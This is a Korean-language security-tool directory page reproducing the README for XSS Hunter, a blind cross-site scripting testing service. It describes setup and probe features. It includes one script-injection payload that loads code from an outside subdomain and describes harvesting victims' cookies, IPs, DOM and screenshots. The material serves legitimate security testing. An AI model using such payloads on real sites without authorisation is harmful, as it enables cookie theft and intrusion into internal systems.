Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
xsshunter — XSS Hunter 서비스 - XSSHunter.com의 휴대용 버전 | Kitploit
도구/GitHubGitHub/mandatoryprogrammer/xsshunter
Vulnerability AnalysisExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubmandatoryprogrammer/xsshunter

xsshunter

XSS Hunter 서비스 - XSSHunter.com의 휴대용 버전

저장소 보기
1.6k3035년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

사용 중단 - 새 EXPRESS 버전을 사용하세요

자세한 내용은 여기를 참조하세요: https://github.com/mandatoryprogrammer/xsshunter-express

XSS Hunter 소스 코드

이것은 https://xsshunter.com 에서 실행되는 소스 코드의 이식 가능한 버전입니다. 보안 전문가와 버그 바운티 헌터가 훨씬 더 강력한 방식으로 XSS를 테스트할 수 있도록 모든 서버에 쉽게 설치할 수 있도록 설계되었습니다.

이 소프트웨어를 설정하고 싶지 않고 바로 테스트를 시작하려면 https://xsshunter.com 을 참조하세요.

요구 사항

  • (가급적) Ubuntu를 실행하는 서버.
  • XSS 페이로드 발사 이메일을 보내기 위한 Mailgun 계정.
  • 도메인 이름. 페이로드 크기를 줄이려면 가능한 짧은 것이 좋습니다. 두 글자 도메인 이름을 찾을 수 있는 좋은 웹사이트는 다음과 같습니다: https://catechgory.com/. 예를 들어 제 도메인은 xss.ht입니다.
  • 와일드카드 SSL 인증서. 여기 저렴한 것이 있습니다. XSS Hunter는 사용자를 하위 도메인으로 식별하고 모든 하위 도메인이 SSL을 지원해야 하므로 필요합니다. Let's Encrypt는 와일드카드 인증서를 지원하지 않기 때문에 사용할 수 없습니다. CA 비즈니스 모델을 비난하는 것은 잠시 접어두겠지만, 확실히 매우 어리석고 와일드카드 인증서를 발급하는 데 비용이 거의 들지 않으므로 (모든 브라우저에서 지원되는 한) 가장 저렴한 제공업체를 선택하세요.

설정

자체 서버에 XSS Hunter를 설정하는 방법에 대한 정보는 https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ 를 참조하세요.

기능 요약

가입 시 yoursubdomain.xss.ht와 같은 특별한 짧은 도메인을 생성합니다. 이 도메인은 XSS 취약점을 식별하고 페이로드를 호스팅합니다. 그런 다음 이 하위 도메인을 XSS 테스트에 사용하여 "><script src=//yoursubdomain.xss.ht></script>와 같은 주입 시도를 합니다. XSS Hunter는 XSS 프로브를 자동으로 제공하고 발사될 때 결과 정보를 수집합니다.

특징

  • 관리되는 XSS 페이로드 발사: XSS Hunter 계정의 제어판에서 모든 XSS 페이로드를 관리합니다.
  • 강력한 XSS 프로브: 프로브가 취약한 페이지에서 발사될 때마다 다음 정보가 수집됩니다:
    • 취약한 페이지의 URI
    • 실행 출처
    • 피해자의 IP 주소
    • 페이지 리퍼러
    • 피해자의 사용자 에이전트
    • 모든 Non-HTTP-Only 쿠키
    • 페이지의 전체 HTML DOM
    • 영향받는 페이지의 전체 스크린샷
    • 책임 HTTP 요청 (XSS Hunter 호환 도구가 사용된 경우)
  • 전체 페이지 스크린샷: XSS Hunter 프로브는 HTML5 캔버스 API를 활용하여 XSS 페이로드가 발사된 취약한 페이지의 전체 스크린샷을 생성합니다. 이 기능을 통해 내부 관리 패널, 지원 데스크, 로깅 시스템 및 기타 내부 웹 애플리케이션을 들여다볼 수 있습니다. 이를 통해 클라이언트나 버그 바운티 프로그램에 취약점의 전체 영향을 보여주는 더 강력한 보고서를 작성할 수 있습니다.
  • 마크업 보고서 생성: 각 XSS 페이로드 보고서에는 미리 생성된 마크다운 보고서가 함께 제공됩니다. 이 생성된 보고서는 Phabricator와 같은 다른 마크다운 지원 플랫폼과도 호환되어 회사 티켓팅 시스템에서 쉽게 버그를 보고할 수 있습니다.
  • XSS 페이로드 발사 이메일 보고서: XSS 페이로드 발사는 또한 상세한 이메일 보고서를 보내며, 이를 적절한 보안 담당자에게 쉽게 전달하여 중요한 버그를 보고할 수 있습니다.
  • 자동 페이로드 생성: XSS Hunter는 웹 애플리케이션 보안 테스트에 사용할 XSS 페이로드를 자동으로 생성합니다.
  • 상호 연관된 주입: 아마도 XSS Hunter의 가장 강력한 기능은 주입 시도와 XSS 페이로드 발사를 상호 연관시키는 기능입니다. XSS Hunter 호환 테스트 도구를 사용하면 특정 페이로드가 발사된 원인을 즉시 알 수 있습니다 (주입 시도 후 몇 주가 지나도!).
  • 페이로드 이메일을 위한 선택적 PGP 암호화: 더 의심이 많으신가요? 클라이언트 측 PGP 암호화를 사용할 수 있으며, 피해자의 브라우저에서 모든 주입 데이터를 암호화한 후 XSS Hunter 서비스로 보냅니다.
  • 페이지 가져오기: XSS 페이로드가 발사되면 페이로드가 자동으로 검색하고 저장할 상대 경로 목록을 지정할 수 있습니다. 이는 일반적으로 접근할 수 없는 내부 시스템의 잘못된 crossdomain.xml 정책과 같은 다른 취약점을 찾는 데 유용합니다.
  • 보조 페이로드 로딩: XSS Hunter가 작업을 완료한 후 로드할 보조 페이로드가 있나요? XSS Hunter는 수집을 완료한 후 실행할 보조 JavaScript 페이로드를 지정할 수 있는 옵션을 제공합니다.
  • iOS 웹 애플리케이션: iOS 웹 앱을 통해 XSS 페이로드 발사를 볼 수도 있습니다. /app 경로로 이동하여 페이지를 iPhone 바탕화면에 웹 애플리케이션으로 저장하기만 하면 됩니다.

주목할 만한 익스플로잇

  • Tesla 내부 서비스 도구의 Blind XSS: https://samcurry.net/cracking-my-windshield-and-earning-10000-on-the-tesla-bug-bounty-program/
  • Spotify의 Salesforce 통합에서의 Blind XSS: https://mhmdiaa.github.io/blind-xss-in-spotify/
  • GoDaddy 지원 패널의 Blind XSS: https://thehackerblog.com/poisoning-the-well-compromising-godaddy-customer-support-with-blind-xss/

기여하고 싶으신가요?

모든 코드는 제가 작성했으며 (그러므로) 모범 사례가 아니며 확실히 최적화/정리가 필요합니다. 모든 풀 리퀘스트는 환영합니다!

도구 다운로드